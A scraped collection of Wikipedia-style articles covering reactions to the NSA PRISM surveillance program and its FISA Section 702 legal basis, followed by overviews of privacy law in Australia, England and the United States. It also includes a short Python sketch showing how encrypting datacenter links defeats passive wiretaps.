But other companies were more compliant, according to people briefed on the negotiations."[120] The other companies held discussions with national security personnel on how to make data available more efficiently and securely.[120] In some cases, these companies made modifications to their systems in support of the intelligence collection effort.[120] The dialogues continued in subsequent months, as General Martin Dempsey, the chairman of the Joint Chiefs of Staff, met with executives including those at Facebook, Microsoft, Google and Intel.[120] These details on the discussions provide insight into the disparity between initial descriptions of the government program, including a training slide which states "Collection directly from the servers",[121] and the companies' denials.[120]

While providing data in response to a legitimate FISA request approved by the FISA Court is a legal requirement, modifying systems to make it easier for the government to collect the data is not. This is why Twitter could legally decline to provide an enhanced mechanism for data transmission.[120] Other than Twitter, the companies were effectively asked to construct a locked mailbox and provide the key to the government, people briefed on the negotiations said.[120] Facebook, for instance, built such a system for requesting and sharing the information.[120] Google does not provide a lockbox system, but instead transmits required data by hand delivery or ssh.[122]

In response to the publicity surrounding media reports of data-sharing, several companies requested permission to reveal more public information about the nature and scope of information provided in response to national security requests. On June 14, 2013, Facebook reported that the U.S. government had authorized the communication of "about these numbers in aggregate, and as a range." In a press release posted to its web site, the company reported, "For the six months ending December 31, 2012, the total number of user-data requests Facebook received from any and all government entities in the U.S. (including local, state, and federal, and including criminal and national security-related requests) – was between 9,000 and 10,000." The company further reported that the requests impacted "between 18,000 and 19,000" user accounts, a "tiny fraction of one percent" of more than 1.1 billion active user accounts.[123]

That same day, Microsoft reported that for the same period it received "between 6,000 and 7,000 criminal and national security warrants, subpoenas and orders affecting between 31,000 and 32,000 consumer accounts from U.S. governmental entities (including local, state and federal)", which impacted "a tiny fraction of Microsoft's global customer base."[124]

Google issued a statement criticizing the requirement that data be reported in aggregated form, stating that lumping national security requests together with criminal request data would be "a step backwards" from its previous, more detailed practices on its website's transparency report. The company said that it would continue to seek government permission to publish the number and extent of FISA requests.[125]

Cisco Systems saw a huge drop in export sales because of fears that the National Security Agency could be using backdoors in its products.[126]

On September 12, 2014, Yahoo! reported that the U.S.
Government threatened the imposition of $250,000 in fines per day if Yahoo didn't hand over user data as part of the NSA's PRISM program.[127] It is not known if other companies were threatened or fined for not providing data in response to legitimate FISA requests.

The New York Times editorial board charged that the Obama administration "has now lost all credibility on this issue,"[128] and lamented that "for years, members of Congress ignored evidence that domestic intelligence-gathering had grown beyond their control, and, even now, few seem disturbed to learn that every detail about the public's calling and texting habits now reside in a N.S.A. database."[129] It wrote with respect to the FISA Court in the context of PRISM that it is "a perversion of the American justice system" when "judicial secrecy is coupled with a one-sided presentation of the issues."[130] According to The New York Times, "the result is a court whose reach is expanding far beyond its original mandate and without any substantive check."[130]

James Robertson, a former federal district judge based in Washington who served on the secret Foreign Intelligence Surveillance Act court for three years between 2002 and 2005, and who ruled against the Bush administration in the landmark Hamdan v. Rumsfeld case, said the FISA court is independent but flawed because only the government's side is represented effectively in its deliberations. "Anyone who has been a judge will tell you a judge needs to hear both sides of a case," said Robertson.[131] Without this, judges do not benefit from adversarial debate. He suggested creating an advocate with security clearance who would argue against government filings.[132] Robertson questioned whether the secret FISA court should provide overall legal approval for the surveillance programs, saying the court "has turned into something like an administrative agency." Under the changes brought by the Foreign Intelligence Surveillance Act of 1978 Amendments Act of 2008, which expanded the US government's authority by requiring the court to approve entire surveillance systems rather than just the individual surveillance warrants it previously handled, "the court is now approving programmatic surveillance. I don't think that is a judicial function."[131] Robertson also said he was "frankly stunned" by the New York Times report[80] that FISA court rulings had created a new body of law broadening the ability of the NSA to use its surveillance programs to target not only terrorists but suspects in cases involving espionage, cyberattacks and weapons of mass destruction.[131]

Former CIA analyst Valerie Plame Wilson and former U.S. diplomat Joseph Wilson, writing in an op-ed article published in The Guardian, said that "Prism and other NSA data-mining programs might indeed be very effective in hunting and capturing actual terrorists, but we don't have enough information as a society to make that decision."[133]

The Electronic Frontier Foundation (EFF), an international non-profit digital-rights group based in the U.S., is hosting a tool by which an American resident can write to their government representatives regarding their opposition to mass spying.[134]

The Obama administration's argument that NSA surveillance programs such as PRISM and Boundless Informant had been necessary to prevent acts of terrorism was challenged by several parties. Ed Pilkington and Nicholas Watt of The Guardian said of the case of Najibullah Zazi, who had planned to bomb the New York City Subway, that interviews with involved parties and U.S.
and British court documents indicated that the investigation into the case had actually been initiated in response to "conventional" surveillance methods such as "old-fashioned tip-offs" of the British intelligence services, rather than to leads produced by NSA surveillance.[135] Michael Daly of The Daily Beast stated that even though Tamerlan Tsarnaev, who conducted the Boston Marathon bombing with his brother Dzhokhar Tsarnaev, had visited the Al Qaeda-affiliated Inspire magazine website, and even though Russian intelligence officials had raised concerns with U.S. intelligence officials about Tamerlan Tsarnaev, PRISM did not prevent him from carrying out the Boston attacks. Daly observed that, "The problem is not just what the National Security Agency is gathering at the risk of our privacy but what it is apparently unable to monitor at the risk of our safety."[136]

Ron Paul, a former Republican member of Congress and prominent libertarian, thanked Snowden and Greenwald and denounced the mass surveillance as unhelpful and damaging, urging instead more transparency in U.S. government actions.[137] He called Congress "derelict in giving that much power to the government," and said that had he been elected president, he would have ordered searches only when there was probable cause of a crime having been committed, which he said was not how the PRISM program was being operated.[138]

New York Times columnist Thomas L. Friedman defended limited government surveillance programs intended to protect the American people from terrorist acts:

Yes, I worry about potential government abuse of privacy from a program designed to prevent another 9/11—abuse that, so far, does not appear to have happened. But I worry even more about another 9/11. ... If there were another 9/11, I fear that 99 percent of Americans would tell their members of Congress: "Do whatever you need to do to, privacy be damned, just make sure this does not happen again." That is what I fear most. That is why I'll reluctantly, very reluctantly, trade off the government using data mining to look for suspicious patterns in phone numbers called and e-mail addresses—and then have to go to a judge to get a warrant to actually look at the content under guidelines set by Congress—to prevent a day where, out of fear, we give government a license to look at anyone, any e-mail, any phone call, anywhere, anytime.[139]

Political commentator David Brooks similarly cautioned that government data surveillance programs are a necessary evil: "if you don't have mass data sweeps, well, then these agencies are going to want to go back to the old-fashioned eavesdropping, which is a lot more intrusive."[140]

Conservative commentator Charles Krauthammer worried less about the legality of PRISM and other NSA surveillance tools than about the potential for their abuse without more stringent oversight. "The problem here is not constitutionality. ... We need a toughening of both congressional oversight and judicial review, perhaps even some independent outside scrutiny. Plus periodic legislative revision—say, reauthorization every couple of years—in light of the efficacy of the safeguards and the nature of the external threat. The object is not to abolish these vital programs.
It's to fix them."[141]

In a blog post, David Simon, the creator of The Wire, compared the NSA's programs, including PRISM, to a 1980s effort by the City of Baltimore to add dialed number recorders to all pay phones to know which individuals were being called by the callers;[142] the city believed that drug traffickers were using pay phones and pagers, and a municipal judge allowed the city to place the recorders. The placement of the dialers formed the basis of the show's first season. Simon argued that the media attention regarding the NSA programs is a "faux scandal."[142][143] Simon had stated that many classes of people in American society had already faced constant government surveillance.

Political activist, and frequent critic of U.S. government policies, Noam Chomsky argued, "Governments should not have this capacity. But governments will use whatever technology is available to them to combat their primary enemy – which is their own population."[144]

A CNN/Opinion Research Corporation poll conducted June 11 through 13 and released in 2013 found that 66% of Americans generally supported the program.[145][146][Notes 1] However, a Quinnipiac University poll conducted June 28 through July 8 and released in 2013 found that 45% of registered voters think the surveillance programs have gone too far, with 40% saying they do not go far enough, compared to 25% saying they had gone too far and 63% saying not far enough in 2010.[147] Other polls have shown similar shifts in public opinion as revelations about the programs were leaked.[148][149]

In terms of economic impact, a study released in August by the Information Technology and Innovation Foundation[150] found that the disclosure of PRISM could cost the U.S. economy between $21.5 and $35 billion in lost cloud computing business over three years.[151][152][153][154]

Sentiment around the world was that of general displeasure upon learning the extent of world communication data mining. Some national leaders spoke against the NSA and some spoke against their own national surveillance. One national minister had scathing comments on the National Security Agency's data-mining program, citing Benjamin Franklin: "The more a society monitors, controls, and observes its citizens, the less free it is."[155] Some question whether the cost of hunting terrorists now overshadows the loss of citizen privacy.[156][157]

Nick Xenophon, an Australian independent senator, asked Bob Carr, the Australian Minister of Foreign Affairs, if e-mail addresses of Australian parliamentarians were exempt from PRISM, Mainway, Marina, and/or Nucleon. After Carr replied that there was a legal framework to protect Australians but that the government would not comment on intelligence matters, Xenophon argued that this was not a specific answer to his question.[158]

Taliban spokesperson Zabiullah Mujahid said, "We knew about their past efforts to trace our system. We have used our technical resources to foil their efforts and have been able to stop them from succeeding so far."[159][160] However, CNN reported that terrorist groups have changed their "communications behaviors" in response to the leaks.[65]

In 2013 the Cloud Security Alliance surveyed cloud computing stakeholders about their reactions to the US PRISM spying scandal. About 10% of non-US residents indicated that they had cancelled a project with a US-based cloud computing provider in the wake of PRISM; 56% said that they would be less likely to use a US-based cloud computing service.
The Alliance predicted that US cloud computing providers might lose as much as €26 billion and 20% of their share of cloud services in foreign markets because of the PRISM spying scandal.[161]

Reactions of internet users in China were mixed between viewing a loss of freedom worldwide and seeing state surveillance coming out of secrecy. The story broke just before U.S. President Barack Obama and Chinese President Xi Jinping met in California.[162][163] When asked about NSA hacking China, the spokeswoman of the Ministry of Foreign Affairs of the People's Republic of China said, "China strongly advocates cybersecurity."[164] The party-owned newspaper Liberation Daily described this surveillance as Nineteen Eighty-Four-style.[165] Hong Kong legislators Gary Fan and Claudia Mo wrote a letter to Obama stating, "the revelations of blanket surveillance of global communications by the world's leading democracy have damaged the image of the U.S. among freedom-loving peoples around the world."[166] Ai Weiwei, a Chinese dissident, said, "Even though we know governments do all kinds of things I was shocked by the information about the US surveillance operation, Prism. To me, it's abusively using government powers to interfere in individuals' privacy. This is an important moment for international society to reconsider and protect individual rights."[167]

Sophie in 't Veld, a Dutch Member of the European Parliament, called PRISM "a violation of EU laws."[168]

The German Federal Commissioner for Data Protection and Freedom of Information, Peter Schaar, condemned the program as "monstrous."[169] He further added that White House claims do "not reassure me at all" and that "given the large number of German users of Google, Facebook, Apple or Microsoft services, I expect the German government ... is committed to clarification and limitation of surveillance." Steffen Seibert, press secretary of the Chancellor's office, announced that Angela Merkel would put these issues on the agenda of the talks with Barack Obama during his pending visit to Berlin.[170] Wolfgang Schmidt, a former lieutenant colonel with the Stasi, said that the Stasi would have seen such a program as a "dream come true," since the Stasi lacked the technology that made PRISM possible.[171] Schmidt expressed opposition, saying, "It is the height of naivete to think that once collected this information won't be used. This is the nature of secret government organizations. The only way to protect the people's privacy is not to allow the government to collect their information in the first place."[100] Many Germans organized protests, including one at Checkpoint Charlie, when Obama went to Berlin to speak.
Matthew Schofield of the McClatchy Washington Bureau said, "Germans are dismayed at Obama's role in allowing the collection of so much information."[100]

The president of the Italian data protection authority (the Guarantor for the Protection of Personal Data), Antonello Soro, said that the surveillance dragnet "would not be legal in Italy" and would be "contrary to the principles of our legislation and would represent a very serious violation."[172]

CNIL, the French data protection watchdog, ordered Google to change its privacy policies within three months or risk fines up to 150,000 euros. The Spanish Agency of Data Protection (AEPD) planned to fine Google between 40,000 and 300,000 euros if it failed to clear the stored data of Spanish users.[173]

William Hague, the foreign secretary of the United Kingdom, dismissed accusations that British security agencies had been circumventing British law by using information gathered on British citizens by PRISM,[174] saying, "Any data obtained by us from the United States involving UK nationals is subject to proper UK statutory controls and safeguards."[174] David Cameron said Britain's spy agencies that received data collected from PRISM acted within the law: "I'm satisfied that we have intelligence agencies that do a fantastically important job for this country to keep us safe, and they operate within the law."[174][175] Malcolm Rifkind, the chairman of Parliament's Intelligence and Security Committee, said that if the British intelligence agencies were seeking to know the content of emails about people living in the UK, then they would have to obtain lawful authority.[175] The UK's Information Commissioner's Office was more cautious, saying it would investigate PRISM alongside other European data agencies: "There are real issues about the extent to which U.S. law agencies can access personal data of UK and other European citizens. Aspects of U.S. law under which companies can be compelled to provide information to U.S. agencies potentially conflict with European data protection law, including the UK's own Data Protection Act. The ICO has raised this with its European counterparts, and the issue is being considered by the European Commission, who are in discussions with the U.S. Government."[168]

Tim Berners-Lee, the inventor of the World Wide Web, accused western governments of hypocrisy for conducting internet spying while criticizing other countries for doing the same. He stated that internet spying can make people feel reluctant to access intimate and private information that is important to them.[176] In a statement given to the Financial Times following the Snowden revelations, Berners-Lee said, "Unwarranted government surveillance is an intrusion on basic human rights that threatens the very foundations of a democratic society."[177]

India's Minister of External Affairs Salman Khurshid defended the PRISM program, saying, "This is not scrutiny and access to actual messages. It is only computer analysis of patterns of calls and emails that are being sent. It is not actually snooping specifically on content of anybody's message or conversation.
Some of the information they got out of their scrutiny, they were able to use it to prevent serious terrorist attacks in several countries."[178] His comments contradicted his Foreign Ministry's characterization of violations of privacy as "unacceptable."[179][180] When the then Minister of Communications and Information Technology Kapil Sibal was asked about Khurshid's comments, he refused to comment on them directly, but said, "We do not know the nature of data or information sought [as part of PRISM]. Even the external ministry does not have any idea."[181] The media felt that Khurshid's defence of PRISM came because the Indian government was rolling out the Central Monitoring System (CMS), which is similar to the PRISM program.[182][183][184]

Khurshid's comments were criticized by the Indian media,[185][186] as well as by the opposition party CPI(M), which stated, "The UPA government should have strongly protested against such surveillance and bugging. Instead, it is shocking that Khurshid has sought to justify it. This shameful remark has come at a time when even the close allies of the US like Germany and France have protested against the snooping on their countries."[187]

Rajya Sabha MP P. Rajeev told The Times of India that "The act of the USA is a clear violation of Vienna convention on diplomatic relations. But Khurshid is trying to justify it. And the speed of the government of India to reject the asylum application of Edward Snowden is shameful."[188]

On June 8, 2013, the Director of National Intelligence issued a fact sheet stating that PRISM "is not an undisclosed collection or data mining program," but rather "an internal government computer system" used to facilitate the collection of foreign intelligence information "under court supervision, as authorized by Section 702 of the Foreign Intelligence Surveillance Act (FISA) (50 U.S.C. § 1881a)."[55] Section 702 provides that "the Attorney General and the Director of National Intelligence may authorize jointly, for a period of up to 1 year from the effective date of the authorization, the targeting of persons reasonably believed to be located outside the United States to acquire foreign intelligence information."[189] In order to authorize the targeting, the attorney general and Director of National Intelligence need to obtain an order from the Foreign Intelligence Surveillance Court (FISA Court) pursuant to Section 702 or certify that "intelligence important to the national security of the United States may be lost or not timely acquired and time does not permit the issuance of an order."[189] When requesting an order, the attorney general and Director of National Intelligence must certify to the FISA Court that "a significant purpose of the acquisition is to obtain foreign intelligence information."[189] They do not need to specify which facilities or property will be targeted.[189]

After receiving a FISA Court order or determining that there are emergency circumstances, the attorney general and Director of National Intelligence can direct an electronic communication service provider to give them access to information or facilities to carry out the targeting and keep the targeting secret.[189] The provider then has the option to: (1) comply with the directive; (2) reject it; or (3) challenge it with the FISA Court.
If the provider complies with the directive, it is released from liability to its users for providing the information and is reimbursed for the cost of providing it,[189] while if the provider rejects the directive, the attorney general may request an order from the FISA Court to enforce it.[189] A provider that fails to comply with the FISA Court's order can be punished with contempt of court.[189]

Finally, a provider can petition the FISA Court to reject the directive.[189] In case the FISA Court denies the petition and orders the provider to comply with the directive, the provider risks contempt of court if it refuses to comply with the FISA Court's order.[189] The provider can appeal the FISA Court's denial to the Foreign Intelligence Surveillance Court of Review and then appeal the Court of Review's decision to the Supreme Court by a writ of certiorari for review under seal.[189]

The Senate Select Committee on Intelligence and the FISA Courts had been put in place to oversee intelligence operations in the period after the death of J. Edgar Hoover. Beverly Gage of Slate said, "When they were created, these new mechanisms were supposed to stop the kinds of abuses that men like Hoover had engineered. Instead, it now looks as if they have come to function as rubber stamps for the expansive ambitions of the intelligence community. J. Edgar Hoover no longer rules Washington, but it turns out we didn't need him anyway."[190]

In November 2017, the district court dismissed the case.

Laura Donohue, a law professor at the Georgetown University Law Center and its Center on National Security and the Law, has called PRISM and other NSA mass surveillance programs unconstitutional.[194]

Woodrow Hartzog, an affiliate at Stanford Law School's Center for Internet and Society, commented that "[The ACLU will] likely have to demonstrate legitimate First Amendment harms (such as chilling effects) or Fourth Amendment harms (perhaps a violation of a reasonable expectation of privacy) ... Is it a harm to merely know with certainty that you are being monitored by the government? There's certainly an argument that it is. People under surveillance act differently, experience a loss of autonomy, are less likely to engage in self exploration and reflection, and are less willing to engage in core expressive political activities such as dissenting speech and government criticism. Such interests are what First and Fourth Amendment seek to protect."[195]

The FISA Amendments Act (FAA) Section 702 is referenced in PRISM documents detailing the electronic interception, capture and analysis of metadata. Many reports and letters of concern written by members of Congress suggest that this section of the FAA in particular is legally and constitutionally problematic, such as by targeting U.S. persons, insofar as "Collections occur in U.S.," as published documents indicate.[196][197][198][199]

The ACLU has asserted the following regarding the FAA: "Regardless of abuses, the problem with the FAA is more fundamental: the statute itself is unconstitutional."[200]

Senator Rand Paul introduced new legislation called the Fourth Amendment Restoration Act of 2013 to stop the NSA or other agencies of the United States government from violating the Fourth Amendment to the U.S.
Constitution using technology and big data information systems like PRISM and Boundless Informant.[201][202]

Besides the information collection program started in 2007, there are two other programs sharing the name PRISM:[203]

Parallel programs, known collectively as SIGADs, gather data and metadata from other sources; each SIGAD has a set of defined sources, targets, types of data collected, legal authorities, and software associated with it. Some SIGADs have the same name as the umbrella under which they sit; BLARNEY's (the SIGAD) summary, set down in the slides alongside a cartoon insignia of a shamrock and a leprechaun hat, describes it as "an ongoing collection program that leverages IC [intelligence community] and commercial partnerships to gain access and exploit foreign intelligence obtained from global networks."

Some SIGADs, like PRISM, collect data at the ISP level, but others take it from the top-level infrastructure. This type of collection is known as "upstream". Upstream collection includes programs known by the blanket terms BLARNEY, FAIRVIEW, OAKSTAR and STORMBREW; under each of these are individual SIGADs. Data that is integrated into a SIGAD can be gathered in ways other than upstream collection and collection from the service providers; for instance, it can be collected from passive sensors around embassies, or even stolen from an individual computer network in a hacking attack.[205][206][207][208][209] Not all SIGADs involve upstream collection; for instance, data could be taken directly from a service provider, either by agreement (as is the case with PRISM), by means of hacking, or in other ways.[210][211][212] According to The Washington Post, the much less known MUSCULAR program, which directly taps the unencrypted data inside the Google and Yahoo private clouds, collects more than twice as many data points as PRISM.[213] Because the Google and Yahoo clouds span the globe, and because the tap was done outside of the United States, unlike PRISM, the MUSCULAR program requires no (FISA or other type of) warrants.[214]
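The practical difference between provider-level collection (PRISM) and wire-level collection (upstream programs and MUSCULAR) is whether the traffic is readable as it crosses the link; after the MUSCULAR disclosure, Google and Yahoo were widely reported to have begun encrypting traffic between their datacenters. The following minimal sketch, written in Python with the third-party cryptography package, is not based on any actual NSA or provider tooling, and its message contents and key handling are hypothetical; it only illustrates why encryption in transit defeats a passive tap: an observer on the link captures ciphertext, while endpoints holding the key recover the message.

# Illustrative sketch only: hypothetical data, not actual NSA or provider tooling.
# Requires the third-party package:  pip install cryptography
from cryptography.fernet import Fernet

# A hypothetical record replicated between two datacenter sites.
message = b"user_id=42; mailbox sync record"

# Unencrypted link: a passive tap on the fiber captures the plaintext itself.
tapped = message
print(tapped)  # b'user_id=42; mailbox sync record'

# Encrypted link: both endpoints share a key (provisioned out of band).
key = Fernet.generate_key()
channel = Fernet(key)

# What actually crosses the wire is an opaque token, useless without the key.
ciphertext = channel.encrypt(message)
print(ciphertext[:32])  # random-looking bytes; reveals nothing about the content

# Only an endpoint holding the key can recover the plaintext.
assert channel.decrypt(ciphertext) == message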
https://en.wikipedia.org/wiki/PRISM_surveillance_program
There is no absolute right to privacy in Australian law and there is no clearly recognised tort of invasion of privacy or similar remedy available to people who feel their privacy has been violated. Privacy is, however, affected and protected in limited ways by common law in Australia and a range of federal, state and territorial laws, as well as administrative arrangements.[1]

There is no statutory definition of privacy in Australia.[1] The Australian Law Reform Commission (ALRC) was given a reference to review Australian privacy law in 2006. During that review it considered the definition of privacy in 2007 in its Discussion Paper 72.[2] In it, the ALRC found there is no "precise definition of universal application" of privacy; instead it conducted the inquiry considering the contextual use of the term "privacy".[2]: para 1.37–1.45 In reaching that conclusion, the ALRC began by considering the concept of privacy:[2]: para 1.29

It is unclear whether a tort of invasion of privacy exists under Australian law.[4] The ALRC summarised the position in 2007:[2]: para 5.12, 5.14

"In Australia, no jurisdiction has enshrined in legislation a cause of action for invasion of privacy; however, the door to the development of such a cause of action at common law has been left open by the High Court in Australian Broadcasting Corporation v Lenah Game Meats Pty Ltd (Lenah Game Meats).[5] To date, two lower courts have held that such a cause of action is part of the common law of Australia. ..."

"At common law, the major obstacle to the recognition in Australia of a right to privacy was, before 2001, the 1937 High Court decision in Victoria Park Racing & Recreation Grounds Co Ltd v Taylor (Victoria Park).[6] In a subsequent decision, the High Court in Lenah Game Meats indicated clearly that the decision in Victoria Park 'does not stand in the path of the development of … a cause of action (for invasion of privacy)'. The elements of such a cause of action – and whether the cause of action is to be left to the common law tradition of incremental development or provided for in legislation – remain open questions."

However, in 2008, the Court of Appeal of the Supreme Court of Victoria held that "damages should be available for breach of confidence occasioning distress, either as equitable compensation, or under Lord Cairns' Act."[7] This is a reference to the equitable doctrine of breach of confidence, which is different from a tort of invasion of privacy, although it has some applications to situations where one's privacy has been invaded.[8][9]

In 2013, Attorney-General of Australia Mark Dreyfus QC MP again referred the issue of privacy to the ALRC. Its terms of reference included a detailed legal design of a statutory cause of action for serious invasions of privacy, and consideration of the appropriateness of any other legal remedies to redress serious invasions of privacy. The final report, Serious Invasions of Privacy in the Digital Era (ALRC Report 123), was tabled in September 2014, after there had been a change of government. There has not been a formal response from the Australian government.

Since at least the 19th century, it has been the practice to enclose mail in an envelope to prevent infringement of confidentiality.
The unauthorised interception of the mail of another is a criminal offence.[10] An Attorney-General discussion paper notes:

On 26 March 2015 both Houses of Parliament passed the Telecommunications (Interception and Access) Amendment (Data Retention) Act 2015, which received royal assent on 13 April 2015.[12] The Act implements recommendations of the Parliamentary Joint Committee on Intelligence and Security (PJCIS) Report of the Inquiry into Potential Reforms of Australia’s National Security Legislation by amending the Telecommunications (Interception and Access) Act 1979 to:
https://en.wikipedia.org/wiki/Privacy_in_Australian_law
Privacy in English law is a rapidly developing area of English law that considers situations where individuals have a legal right to informational privacy - the protection of personal or private information from misuse or unauthorized disclosure.[1] Privacy law is distinct from those laws such as trespass or assault that are designed to protect physical privacy. Such laws are generally considered as part of criminal law or the law of tort. Historically, English common law has recognised no general right or tort of privacy, and offered only limited protection through the doctrine of breach of confidence and a "piecemeal" collection of related legislation on topics like harassment and data protection. The introduction of the Human Rights Act 1998 incorporated into English law the European Convention on Human Rights. Article 8.1 of the ECHR provided an explicit right to respect for a private life. The Convention also requires the judiciary to "have regard" to the Convention in developing the common law.[2]

The earliest definition of privacy in English law was given by Thomas M. Cooley, who defined privacy as "the right to be left alone".[3] In 1972 the Younger Committee, an inquiry into privacy, stated that the term could not be defined satisfactorily. Again in 1990 the Calcutt Committee concluded that: "nowhere have we found a wholly satisfactory statutory definition of privacy".[3]

There is currently no general right to privacy in common law.[4] This point was reaffirmed when the House of Lords ruled in Campbell v MGN (a case involving a supermodel who claimed that she had not taken drugs).[5][failed verification] It has also been stated that the European Convention on Human Rights does not require the development of an independent tort of privacy.[2] In the absence of a common law right to privacy in English law, torts such as the equitable doctrine of breach of confidence,[6] torts linked to the intentional infliction of harm to the person,[7] and public law torts relating to the use of police powers[8] have been used to fill a gap in the law. The judiciary has developed the law in an incremental fashion and has resisted the opportunity to create a new tort.[9]

British radio DJ Sara Cox's case against The People newspaper in 2003 was one of the first celebrity privacy cases. The media referred to the case as a "watershed". The disc jockey sued after the newspaper printed nude photographs of her taken while on her honeymoon. However, the case was settled out of court and so did not establish a precedent.[10] The settlement was seen as discrediting the Press Complaints Commission.[11]

The expansion of the doctrine of breach of confidence under the Human Rights Act began with the Douglas v Hello! decision in 2005. Section 6 of the Human Rights Act requires English courts to give effect to the rights in the Convention when developing the common law. There is no need to show a pre-existing relationship of confidence where private information is involved, and the courts have recognised that the publication of private material represents a detriment in itself.[2] The Human Rights Act has horizontal effect in disputes between private individuals, meaning that it is just as applicable as if one party had been a public body.[12] Breach of confidence now extends to private information (regardless of whether it is confidential) so as to give effect to Article 8 of the European Convention on Human Rights.
Before this, breach of confidence afforded "umbrella protection" to both personal and non-personal information.[1]

Following Max Mosley's successful action in 2008 against the News of the World newspaper for publishing details of his private life, he announced that he would challenge English law's implementation of the Article 8 right to privacy guaranteed when the Human Rights Act implemented the European Convention on Human Rights into English law.[13] The European Court of Human Rights (ECHR) was asked to rule on the issue of "prior notification". This would require journalists to approach the subject of any investigation and inform them of the details of any allegations made about them, thereby allowing an injunction to be sought.[13] The ECHR ruled that domestic law was not in conflict with the Convention.[14]

The increasing protection afforded to the private lives of individuals has sparked debate as to whether English law gives enough weight to freedom of the press and whether intervention by Parliament would be beneficial. The editor of the satirical magazine Private Eye, Ian Hislop, has argued against the development of English privacy law. He told the BBC's Panorama: "You don't have to prove it [an allegation] isn't true, you just have to prove that it's private by your definition. And in some of the cases the definition of privacy is pretty weak."[15] However, Liberal Democrat politician Mark Oaten has stated that the press were right to expose details of his private life:
https://en.wikipedia.org/wiki/Privacy_in_English_law
Privacy laws of the United States deal with several different legal concepts. One is the invasion of privacy, a tort based in common law allowing an aggrieved party to bring a lawsuit against an individual who unlawfully intrudes into their private affairs, discloses their private information, publicizes them in a false light, or appropriates their name for personal gain.[1]

The essence of the law derives from a right to privacy, defined broadly as "the right to be let alone". It usually excludes personal matters or activities which may reasonably be of public interest, like those of celebrities or participants in newsworthy events. Invasion of the right to privacy can be the basis for a lawsuit for damages against the person or entity violating the right. Constitutional protections of privacy include the Fourth Amendment right to be free of unwarranted search or seizure, the First Amendment right to free assembly, and the Fourteenth Amendment due process right, recognized by the Supreme Court of the United States as protecting a general right to privacy within family, marriage, motherhood, procreation, and child rearing.[2][3]

Attempts to improve consumer privacy protections in the U.S. in the wake of the 2017 Equifax data breach, which affected 145.5 million U.S. consumers, failed to pass in Congress.[4]

The early years in the development of privacy rights began with English common law, protecting "only the physical interference of life and property".[5] The Castle doctrine analogizes a person's home to their castle – a site that is private and should not be accessible without permission of the owner. The development of tort remedies by the common law is "one of the most significant chapters in the history of privacy law".[6] Those rights expanded to include a "recognition of man's spiritual nature, of his feelings and his intellect." Eventually, the scope of those rights broadened even further to include a basic "right to be let alone," and the former definition of "property" would then comprise "every form of possession – intangible, as well as tangible." By the late 19th century, interest in privacy grew as a result of the growth of print media, especially newspapers.[6]

Between 1850 and 1890, U.S. newspaper circulation grew by 1,000 percent – from 100 papers with 800,000 readers to 900 papers with more than 8 million readers.[6] In addition, newspaper journalism became more sensationalized, and was termed yellow journalism. The growth of industrialism led to rapid advances in technology, including the handheld camera, as opposed to earlier studio cameras, which were much heavier and larger. In 1900, the Eastman Kodak company introduced the Kodak Brownie, and it became a mass market camera by 1901, cheap enough for the general public. This allowed people and journalists to take candid snapshots in public places for the first time.

Privacy was dealt with at the state level. For example, Pavesich v. New England Life Insurance Company (1905) was one of the first specific endorsements of the right to privacy as derived from natural law in US law. Judith Wagner DeCew stated, "Pavesich was the first case to recognize privacy as a right in tort law by invoking natural law, common law, and constitutional values."[7]

Samuel D. Warren and Louis D. Brandeis, partners in a new law firm, feared that this new small camera technology would be used by the "sensationalistic press."
Seeing this becoming a likely challenge to individual privacy rights, they wrote the "pathbreaking"[6] Harvard Law Review article in 1890, "The Right to Privacy".[8] According to legal scholar Roscoe Pound, the article did "nothing less than add a chapter to our law",[9] and in 1966 legal textbook author Harry Kalven hailed it as the "most influential law review article of all".[6] In the Supreme Court case of Kyllo v. United States, 533 U.S. 27 (2001), the article was cited by a majority of justices, both those concurring and those dissenting.[6]

The development of the doctrine regarding the tort of "invasion of privacy" was largely spurred by the Warren and Brandeis article, "The Right to Privacy". In its introduction, they explain why they wrote the article: "Political, social, and economic changes entail the recognition of new rights, and the common law, in its eternal youth, grows to meet the demands of society".[8] More specifically, they also shift their focus to newspapers:

The press is overstepping in every direction the obvious bounds of propriety and of decency. Gossip is no longer the resource of the idle and of the vicious, but has become a trade, which is pursued with industry as well as effrontery. To satisfy a prurient taste the details of sexual relations are spread broadcast in the columns of the daily papers. ... The intensity and complexity of life, attendant upon advancing civilization, have rendered necessary some retreat from the world, and man, under the refining influence of culture, has become more sensitive to publicity, so that solitude and privacy have become more essential to the individual; but modern enterprise and invention have, through invasions upon his privacy, subjected him to mental pain and distress, far greater than could be inflicted by mere bodily injury.[8]

They then clarify their goals: "It is our purpose to consider whether the existing law affords a principle which can properly be invoked to protect the privacy of the individual; and, if it does, what the nature and extent of such protection is".[8]

Warren and Brandeis write that privacy rights should protect both businesses and private individuals. They describe rights in trade secrets and unpublished literary materials, regardless of whether those rights are invaded intentionally or unintentionally, and without regard to any value they may have. For private individuals, they try to define how to protect "thoughts, sentiments, and emotions, expressed through the medium of writing or of the arts". They describe such things as personal diaries and letters needing protection, and how that should be done: "Thus, the courts, in searching for some principle upon which the publication of private letters could be enjoined, naturally came upon the ideas of a breach of confidence, and of an implied contract". They also define this as a breach of trust, where a person has trusted that another will not publish their personal writings, photographs, or artwork, without their permission, including any "facts relating to his private life, which he has seen fit to keep private".
And recognizing that technological advances will become more relevant, they write: "Now that modern devices afford abundant opportunities for the perpetration of such wrongs without any participation by the injured party, the protection granted by the law must be placed upon a broader foundation".[8]

There have been many laws related to privacy and data protection enacted in recent years as a result of rapid technological advancements. However, critics and scholars have argued that these guidelines usually focus on legal factors rather than technical details, which makes it difficult for engineers and developers to ensure that new designs meet the guidelines stated in privacy laws.[10]

In the United States, "invasion of privacy" is a commonly used cause of action in legal pleadings. Modern tort law, as first categorized by William Prosser, includes four categories of invasion of privacy:[11]

Intrusion of solitude occurs where one person intrudes upon the private affairs of another. In a famous case from 1944, author Marjorie Kinnan Rawlings was sued by Zelma Cason, who was portrayed as a character in Rawlings' acclaimed memoir, Cross Creek.[12] The Florida Supreme Court held that a cause of action for invasion of privacy was supported by the facts of the case, but in a later proceeding found that there were no actual damages.

